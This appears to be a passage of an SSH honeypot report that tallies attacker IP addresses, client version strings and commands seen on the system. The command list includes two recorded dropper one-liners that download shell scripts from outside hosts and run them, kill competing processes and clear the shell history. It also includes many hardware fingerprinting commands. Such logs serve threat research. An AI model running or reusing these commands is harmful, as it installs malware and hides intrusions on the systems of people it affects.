2 79.95.123.68
2 81.242.22.60
2 82.66.59.170
2 88.175.186.160
2 92.75.135.194
2 94.216.181.65
2 95.250.12.227
3 103.147.34.150
3 35.243.208.234
4 45.155.91.99
4 50.53.78.145
5 159.203.17.55
6 85.9.107.218
7 85.209.11.254
11 85.209.11.27
12 143.198.46.19
12 161.35.227.26
13 141.98.11.90
14 164.92.70.251
14 165.232.189.205
16 141.98.11.11
19 139.59.16.110
20 158.178.232.193
26 47.76.57.249
42 85.209.11.227
43 103.145.5.91
55 164.92.91.60
56 182.72.219.186
71 174.138.90.189
80 18.166.75.252
95 167.71.97.26
115 97.74.91.249
145 8.242.72.116
324 193.201.9.104
421 170.64.194.66
429 170.64.151.139
429 170.64.155.115
429 170.64.222.200
909 194.169.175.178
UserAgents
1 SSH-2.0-Go
2 SSH-2.0-libssh_0.10.5
2 SSH-2.0-makiko
2 SSH-2.0-OpenSSH_6.7p1 Raspbian-5+deb8u1
2 SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u1
2 SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u2
2 SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u3
2 SSH-2.0-PuTTY_Release_0.79
3 SSH-2.0-OpenSSH_9.6
4 SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3
4 SSH-2.0-paramiko_3.3.1
6 SSH-2.0-libssh2_1.10.0
6 SSH-2.0-OpenSSH_8.4p1 Raspbian-5+b1
12 SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u2+rpt1
16 SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u1
29 SSH-2.0-OpenSSH_8.4p1 Debian-5
43 SSH-2.0-Renci.SshNet.SshClient.0.0.1
3783 SSH-2.0-Go
Commands
1 exit
1 ls
2 scp -t /tmp/1sNAckf4
2 scp -t /tmp/2cq2IpRW
2 scp -t /tmp/7NuAG7fn
2 scp -t /tmp/8jksgsvn
2 scp -t /tmp/HS868ivU
2 scp -t /tmp/IJAfnCiW
2 scp -t /tmp/kpiSMGUh
2 scp -t /tmp/NED154g6
2 scp -t /tmp/pRbkqVLW
2 scp -t /tmp/SNFp5G32
2 scp -t /tmp/yidNbg1Z
2 sh; for proc_dir in /proc/*; do pid=${proc_dir##*/}; result=$(ls -l "/proc/$pid/exe" 2>/dev/null); [ "$result" != "${result%(deleted)}" ] && kill -9 "$pid"; done; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf *.sh; wget http://45.95.147.173/z.sh; curl -O http://45.95.147.173/z.sh; chmod 777 z.sh; sh z.sh; tftp 45.95.147.173 -c get tz.sh; chmod 777 tz.sh; sh tz.sh; tftp -r tz2.sh -g 45.95.147.173; chmod 777 tz2.sh; sh tz2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.147.173 z1.sh z1.sh; sh z1.sh; rm -rf z.sh tz.sh tz2.sh z1.sh; rm -rf *
3 wget "185.36.81.42:2224" curl 185.36.81.42:2224
4 scp -t /tmp/QDoS3aij
4 scp -t /tmp/w5pqNYsW
8 uname -a ; cd /tmp ; wget http://80.94.92.20/ssh.sh ; chmod 777 ssh.sh; ./ssh.sh ; sh ssh.sh ; rm -rf ssh* ; history -c ; cd /var/tmp ; curl -O http://80.94.92.20/ssh.sh ; chmod 777 ssh.sh ; ./ssh.sh ; sh ssh.sh ; rm -rf ssh* ; history -c ; cd /tmp ; tftp -r ssh.sh -g 80.94.92.20 ; chmod 777 ssh.sh ; ./ssh.sh ; sh ssh.sh ; rm -rf ssh* ; history -c ; tftp 80.94.92.20 -c get ssh2.sh ; chmod 777 ssh2.sh ; ./ssh2.sh ; sh ssh2.sh ; rm -rf ssh2.sh ; history -c ; ftpget -v -u anonymous -p anonymous -P 21 80.94.92.20 ssh3.sh ssh3.sh; chmod 777 ssh3.sh; ./ssh3.sh ; sh ssh3.sh ; rm -rf ssh3.sh ; rm -rf hydro* ; rm -rf ssh* ; history -c
8 uname -s -m
37 uname -a
278 ip r | grep -Eo ''[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/[0-9]{1,2}''
278 lspci | grep "3D controller" | cut -f5- -d '' ''
278 lspci | grep VGA -c
278 lspci | grep VGA | cut -f5- -d '' ''
278 nvidia-smi -q | grep "Product Name" | awk ''{print $4, $5, $6, $7, $8, $9, $10, $11}'' | grep . -c
278 nvidia-smi -q | grep "Product Name" | head -n 1 | awk ''{print $4, $5, $6, $7, $8, $9, $10, $11}''
278 uptime -p
291 lspci | egrep VGA | grep Radeon | wc -l | head -c 1
291 nvidia-smi -q | grep "Product Name"
292 nvidia-smi -q | grep "Product Name" | awk ''{print $4, $5, $6, $7, $8, $9, $10, $11}'' | wc -l | head -c 1
292 uname -m
294 lspci | egrep VGA && lspci | grep 3D
1707 lspci | egrep VGA && lspci | grep 3D
2001 curl ipinfo.io/org
2001 lscpu | egrep "Model name:" | cut -d '' '' -f 14-
2001 nproc
2002 uptime | grep -ohe ''up .*'' | sed ''s/,//g'' | awk ''{ print $2" "$3 }''
2282 uname -s -v -n -r -m